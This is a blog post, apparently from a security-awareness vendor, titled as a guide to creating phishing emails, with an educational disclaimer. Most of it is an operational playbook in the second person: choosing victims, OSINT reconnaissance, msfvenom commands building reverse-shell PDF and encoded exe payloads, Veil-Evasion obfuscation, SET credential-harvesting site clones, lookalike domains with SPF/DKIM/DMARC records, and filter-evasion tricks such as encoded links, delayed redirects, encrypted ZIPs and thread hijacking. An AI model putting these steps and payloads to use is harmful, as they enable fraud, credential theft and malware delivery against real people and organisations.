How to Create a Phishing Email: An In-Depth Guide

Oct 4, 2024

Disclaimer: This writeup is written only for educational purposes. Phishing attacks are illegal, unethical and they can damage people lives also. Understanding these methods is critical for cybersecurity professionals to enhance defenses and prevent breaches, however this knowledge base shall not be used to create and launch a phishing attack.

Phishing Email

From Where Phishing Word Came Into Existence

The term "phishing" in "phishing attack" is actually a clever play on the word "fishing." Just like fishermen throw their bait into the water to catch fish, cybercriminals throw their digital bait into the vast sea of internet users, hoping someone takes fall into the trap. And, trust me, these attackers can be just as patient as that uncle who sits by the lake for hours with his fishing rod 😉!

Now, why the funky spelling with a "ph"? Well, that comes from the hacker scene of the 1990s, where using "ph" instead of "f" was the cool, edgy thing to do (remember "phreaking" with phone systems?). Hackers, always trying to add a bit of flair to their tricks, adopted this lingo for digital baiting.

So, next time you see the word "phishing," just imagine some sneaky digital person out there, waiting in their lines, hoping to hook an unsuspecting internet fish… I mean, user! Or you. Hehe

It’s a funny image until you realize their "catch of the day" might be your personal info. Yikes!

In this writeup, we’re going to dive deep into how phishing emails are meticulously crafted, not to encourage malicious behavior, but to empower professionals like you to recognize, prevent, and educate others about these threats. Let’s break down each phase of a phishing campaign, keeping in mind that understanding the “how” is a huge part of defending against the “what.”

1. Defining Your Goal: What's the Endgame?

Every phishing campaign starts with a simple question: What do you want to achieve? Before doing anything else, you have to define your goal. Is it to steal login credentials? Implant malware? Trick the victim into transferring funds? Or just data harvesting.

Knowing the endgame shapes the entire strategy, from the email’s wording to the choice of tools.

Who is the Ideal Victim?

Not all phishing emails target the masses; some are crafted for a specific individual or group, known as "spear-phishing." To define the ideal victim:

• Role in the Organization: Ideal target are those with privileged access, like CEOs, CFOs, or IT administrators. Some hackers might go after HR personnel since they handle sensitive employee information.

• Behavior: People who frequently manage financial transactions, travel often, or have an active online social media presence are prime targets. Just ask yourself: Who is more likely to respond to a seemingly urgent request?

• Digital Footprint: Someone’s social media activity can reveal a lot about that individual. Are they involved in high-stakes projects? Where they are travelling? What they like? What kind of friends they got? What is their favorite holiday spot? Did they recently talk about a job promotion? All of this helps you to craft an email that feels personalized and urgent.

2. Conducting Reconnaissance: The Research Phase

How to create Phishing Email Template

You shall spend most of the time in reconnaissance phase which means they try to hunt for maximum possible data about individual through various channels and tools available. In this section we will reveal how to collect detailed information about a potential victim before starting a phishing campaign.

Usage of OSINT Tools

There are various OSINT tool available on github and in default Kali build which can be used to gather information about individual and organization. Some of such tools are:

• theHarvester: This is an open-source tool that gathers information about the target’s domain, such as email addresses, subdomains, and IPs. It scrapes data from multiple sources like Google, Bing, and LinkedIn.

• Maltego: A graphical OSINT tool that maps out relationships between people, domains, email addresses, and infrastructure. It provides visual graphs that make it easy to see how information is connected.

• SpiderFoot: An automated reconnaissance tool that can mine data like domain names, email addresses, IP addresses, and much more from hundreds of public resources.

• Recon-ng: An OSINT reconnaissance framework that allows you to use built-in modules to extract details about employees, infrastructure, domains, and more.

Collecting the Right Data

Having the right amount of personal and professional data about the target is most crucial part of a successful phishing campaign. This phase should be carried out with utmost care and in details. The more data you will collect about someone, the more credible the phishing email appears. We can break down the strategies you have to use in general to get most relevant about victims:

  1. Email Formats: You may use tools like Hunter.io to figure out the format of the target company’s email addresses. Do they use firstname.lastname@company.com? Or perhaps f.lastname@company.com? Knowing this helps them create a fake yet convincing sender email.


  2. Social Media The Holy Grail of Information: People post their individual and family photos, their travel details, pictures of their hotels, what they like most, what they dislike on various social media platforms like facebook, meta, twitter, Instagram. Professional updates are normally posted on LinkedIn. These social media platforms are goldmine for you. They look for employees’ roles, job functions, and recent activities, their recent activity, travel history etc. Specially, Facebook, Instagram and Twitter reveal personal details, hobbies, and even daily routines. A well-crafted phishing email could mention something as specific as, "Hope your son’s soccer game went well!"


  3. Investigating the target company: Spend time to learn about the company’s ongoing projects, partners, and internal lingo. A simple visit to the target company’s website can provide an idea of the company’s branding and communication style. Publicly available documents, press releases, and even job postings can reveal which tools and technologies the company uses. This information allows you to create a more tailored and believable email.

3. Crafting the Email Body: It’s All in the Details

Once the research and Reconnaissance phase is complete, you can start creating the phishing email. The key here is believability; that means how much believe the victim will have on your email. The email should fit right into the target’s normal communication flow without creating any doubt.

Example Email Body

Phishing Email Template

The language is formal, the urgency is clear, and the signature mimics the target's company style. The email includes enough subtle details (like the mention of the victim's name) to lower the recipient's defenses.

4. Infusing Payloads or Malicious Hyperlinks

This step is where things get technical. You can embed a malicious payload within the email, either as an attachment or as a hyperlink leading to a compromised site.

4.1. Crafting Payloads Using Msfvenom

The tool msfvenom from Metasploit is popular for creating payloads, especially when you want to go beyond simple phishing.

Example 1: Creating a Simple Malicious PDF

Here’s how an you might want to use msfvenom to create a basic payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f pdf > malicious.pdf

• -p specifies the payload (windows/meterpreter/reverse_tcp).

• LHOST is the your IP address.

• LPORT is the listening port for the reverse shell.

• -f is the file format; in this case, a PDF.

Once the PDF is embedded into the email, it looks normal and common. The recipient, expecting a normal PDF, ends up launching a reverse shell to you when they open it.

Example 2: Creating an Advanced Encoded Payload

A simple payload might be detected by antivirus software, so you may have to use encoders to obfuscate it:

Use msfvenom

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -e x86/shikata_ga_nai -i 3 -f exe > advanced_payload.exe

• -e x86/shikata_ga_nai encodes the payload to make it more difficult to detect.

• -i 3 encodes it three times to further evade detection.

Obfuscation Method

To further evade detection, you can use tools like Veil-Evasion:

veil -p python/meterpreter/rev_https --ip 192.168.1.100 --port 443

• Veil-Evasion generates a Python script disguised as a benign program. When executed, it establishes a reverse HTTPS Meterpreter session, allowing you to maintain stealthy access.

4.2. Using the Social Engineering Toolkit (SET)

SET (Social Engineering Toolkit) is widely used to clone legitimate websites and harvest credentials.

Example of Using SET

  1. Open SET:

sudo setoolkit

  1. Choose Option 1 (Social-Engineering Attacks) → Option 2 (Website Attack Vectors) → Option 3 (Credential Harvester Attack Method).

  2. Select Site Cloner and enter the URL of the site you want to clone, such as https://example.com/login.

  3. Enter your IP address to listen for credentials.

SET creates a perfect replica of the target site, which you can link to in the phishing email. The victim, thinking they’re on a trusted site, enters their credentials, which you captures.

5. Choosing an Email Service Provider: Blending In

You have to use free email services like Gmail or Outlook to send phishing emails, as these platforms are commonly trusted by recipients. However, sophisticated attackers may set up their own SMTP servers to avoid detection and control the sending process entirely.

6. Spoofing Techniques: Building Credibility

Fake Domain Purchase

Attackers often buy domains that closely resemble legitimate ones (e.g., micr0soft.com). They then use these domains to create convincing email addresses.

  1. SSL Certificate: Obtaining an SSL certificate for the fake domain adds an extra layer of legitimacy.

  2. Email Hosting: Attackers use hosting services to create fake email addresses (e.g., support@micr0soft.com).

7. The Challenges Posed by Email Filters and How to Evade Detection in Phishing Emails

Email filters are the unsung heroes of digital security, standing guard to protect users from a tsunami of malicious phishing emails. With the advancement of machine learning and AI-driven filtering systems, getting a phishing email past these defenses has become increasingly challenging for attackers. However, you can continue to develop sophisticated methods to evade detection. In this article, we’ll explore the challenges posed by email filters and discuss practical techniques you might use to bypass these filters, helping cybersecurity professionals better prepare and defend against such threats.

Understanding Email Filters

Before diving into the evasion tactics, it’s crucial to understand how modern email filters work. Email filtering solutions like Microsoft Exchange Online Protection (EOP), Gmail's spam filter, and Proofpoint use a combination of techniques to detect and block phishing emails:

• Content Analysis: Examines the email body for suspicious phrases, malicious attachments, or obfuscated URLs.

• Header Analysis: Checks the sender’s address, SPF, DKIM, and DMARC records to verify authenticity.

• Machine Learning: Uses AI to identify patterns associated with phishing attacks, learning from previously detected phishing attempts.

• URL Inspection: Scans embedded links for known malicious websites or redirects.

• Attachment Scanning: Uses sandboxing to analyze email attachments for potentially harmful behavior.

• Reputation Checks: Compares sender information against databases of known spam and phishing sources.

Given these sophisticated defenses, you need to employ various techniques to evade detection. Here are some of the most common challenges posed by email filters and the methods used to bypass them.

Challenge 1: Content Analysis

Email filters aggressively scan the body of emails for keywords and patterns commonly associated with phishing. Phrases like "password reset," "urgent action required," and "click here" often trigger alerts.

Bypass Technique: Content Obfuscation

You can obfuscate text and links within the email to bypass content scanning.

Practical Example: Using HTML Encoding

Instead of directly placing a malicious link in the email, you can encode it using HTML. Here’s an example:

Original link:

<a href="http://malicious-website.com">Click here to update your account</a>

Obfuscated link using HTML encoding:

<a href="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#109;&#97;&#108;&#105;&#99;&#105;&#111;&#117;&#115;&#45;&#119;&#101;&#98;&#115;&#105;&#116;&#101;&#46;&#99;&#111;&#109;">Click here to update your account</a>

By encoding the URL, you can try to evade detection by content analysis algorithms that might not interpret the obfuscated characters correctly.

Practical Example: Using Image-Based Emails

Instead of using plain text that can easily be scanned by filters, you can embed the message as an image:

<img src="http://safe-image-server.com/phishing-content.png" alt="Click here to verify your account">

This approach makes it harder for content scanners to read the text since the text is now part of an image. However, sophisticated filters have started to use optical character recognition (OCR) to counter this technique.

Challenge 2: URL Inspection

URL inspection mechanisms are designed to detect and block links to known phishing websites or sites with suspicious behavior like multiple redirects.

Bypass Technique: URL Shortening and Redirection

Attackers use URL shortening services (e.g., Bitly, TinyURL) to obscure the final destination. Once the shortened link passes the initial inspection, it redirects the user to the malicious website.

Practical Example: Time-Based URL Redirection

You can use a technique called time-based redirection, where the link initially points to a harmless website to pass email filters. Once the email is delivered, the attacker changes the URL to redirect to a malicious site.

  1. The initial phishing email contains a link to a benign site (e.g., http://safesite.com).

  2. After a certain period (e.g., 24 hours), the attacker updates the server's configuration to redirect visitors from http://safesite.com to http://malicious-website.com.

This delayed tactic exploits the fact that many email filters scan links at the time of delivery, not at the time of the user’s click.

Challenge 3: Header Analysis and Authentication Checks

Email filters scrutinize email headers to identify spoofed addresses and verify sender authenticity using SPF, DKIM, and DMARC records.

Bypass Technique: Email Header Manipulation and Domain Spoofing

You may purchase domains that resemble legitimate domains (e.g., microsoft-support.com) and properly configure SPF, DKIM, and DMARC records to appear authentic.

Practical Example: Configuring SPF, DKIM, and DMARC for a Fake Domain

  1. Domain Registration: Register a domain similar to the target (e.g., secure-paypal.com).

  2. SPF Record Setup: Add an SPF record in the DNS to specify authorized mail servers.

v=spf1 a mx ip4:123.456.78.90 -all

3. DKIM Configuration: Generate DKIM keys and add the public key to the DNS:

o Private Key: Stored on the mail server.

o Public Key: Published in DNS as:

default._domainkey.secure-paypal.com TXT "v=DKIM1; k=rsa; p=PUBLIC_KEY_HERE"

4. DMARC Record: Publish a DMARC record to define the handling policy:

_dmarc.secure-paypal.com TXT "v=DMARC1; p=none; rua=mailto:report@secure-paypal.com"

By configuring these records correctly, your aim is to bypass SPF, DKIM, and DMARC checks and make the phishing email appear legitimate.

Challenge 4: Attachment Scanning

Most email filters use sandbox environments to open attachments and detect malicious behavior, making it difficult for attackers to deliver malware through attachments.

Bypass Technique: Payload Obfuscation and Multi-Stage Downloads

Practical Example: Using Encrypted ZIP Files

You can use password-protected ZIP files to deliver malicious attachments. Since the filter cannot scan the encrypted content, it may pass through. The email provides the password, tricking the recipient into extracting the contents.

Sample Email Text:

Please find the confidential report attached. Use the password "Secure123" to open the file.

Upon extraction, the recipient finds a document with embedded macros. If enabled, these macros download the final payload (e.g., a trojan) from a remote server.

Practical Example: Using Multi-Stage Payloads

  1. The attacker sends a seemingly harmless PDF with a link inside.

  2. When the recipient clicks the link, it downloads a small script (e.g., a VBS file).

  3. The script, when executed, connects to an external server to download the main malicious payload.

This multi-stage approach makes it more challenging for filters to detect the final payload during the initial inspection.

Phishing Email Stealing Data

Challenge 5: Machine Learning and Behavior Analysis

Advanced filters use machine learning models to identify phishing attempts based on email behavior, user interaction patterns, and historical data.

Bypass Technique: Mimicking Normal Email Behavior

You can attempt to mimic typical email patterns to avoid triggering machine learning-based detection.

Practical Example: Email Thread Hijacking

  1. You compromise an email account within a company.

  2. They monitor ongoing email threads and insert themselves into the conversation, using context from the thread to make their messages appear legitimate.

  3. Since the email appears to be part of an ongoing, legitimate conversation, filters relying on behavioral analysis are less likely to flag it.

Conclusion

Phishing is not just about sending random emails; it's a rigorous and thoughtful process requiring research, technical know-how, and psychological manipulation. By dissecting this process, we’ve aimed to provide you with the knowledge to recognize and combat such attacks. Remember, it’s not just about protecting systems; it’s about safeguarding the people behind those systems.

Stay Vigilant: In the end, the best defense is awareness. Spread the knowledge, train employees, and always verify before you click.


Latest Blogs

Understanding the Dark Web: The Basics (Part 1)
Understanding the Dark Web: The Basics (Part 1)
Understanding the Dark Web: The Basics (Part 1)
Understanding the Dark Web: The Basics (Part 1)

Understanding the Dark Web: The Basics (Part 1)

Understanding the Dark Web: The Basics (Part 1)

Understanding the Dark Web: The Basics (Part 1)

Understanding the Dark Web: The Basics (Part 1)

Nov 5, 2024

Why Cyber Awareness is Essential for Companies: Expert Tips for Building a Security-First Culture

Why Cyber Awareness is Essential for Companies: Expert Tips for Building a Security-First Culture

Why Cyber Awareness is Essential for Companies: Expert Tips for Building a Security-First Culture

Why Cyber Awareness is Essential for Companies: Expert Tips for Building a Security-First Culture

Oct 25, 2024

Phishing Training for Employees: Expert Tips on How to Stay Safe and Protect Your Organization

Phishing Training for Employees: Expert Tips on How to Stay Safe and Protect Your Organization

Phishing Training for Employees: Expert Tips on How to Stay Safe and Protect Your Organization

Phishing Training for Employees: Expert Tips on How to Stay Safe and Protect Your Organization

Oct 18, 2024

How to create a Phishing Email
How to create a Phishing Email
How to create a Phishing Email
How to create a Phishing Email

How to Create a Phishing Email: An In-Depth Guide

How to Create a Phishing Email: An In-Depth Guide

How to Create a Phishing Email: An In-Depth Guide

How to Create a Phishing Email: An In-Depth Guide

Oct 4, 2024

Phone receiving a suspicious SMS, representing a smishing attack
Phone receiving a suspicious SMS, representing a smishing attack
Phone receiving a suspicious SMS, representing a smishing attack
Phone receiving a suspicious SMS, representing a smishing attack

Smishing: The New Face of Digital Fraud

Smishing: The New Face of Digital Fraud

Smishing: The New Face of Digital Fraud

Smishing: The New Face of Digital Fraud

Sep 30, 2024

How to create a phishing link
How to create a phishing link
How to create a phishing link
How to create a phishing link

How to Make a Phishing Link: Understanding the Threat and Safeguarding Your Email

How to Make a Phishing Link: Understanding the Threat and Safeguarding Your Email

How to Make a Phishing Link: Understanding the Threat and Safeguarding Your Email

How to Make a Phishing Link: Understanding the Threat and Safeguarding Your Email

Oct 14, 2024

Get updates in your inbox directly

You are now subscribed.

Get updates in your inbox directly

You are now subscribed.

Get updates in your inbox directly

You are now subscribed.

Get updates in your

inbox directly

You are now subscribed.

Enable your employees as first line of defense and expand your digital footprints without any fear.

Enable your employees as first line of defense and expand your digital footprints without any fear.

Enable your employees as first line of defense and expand your digital footprints without any fear.

Enable your employees as first line of defense and expand your digital footprints without any fear.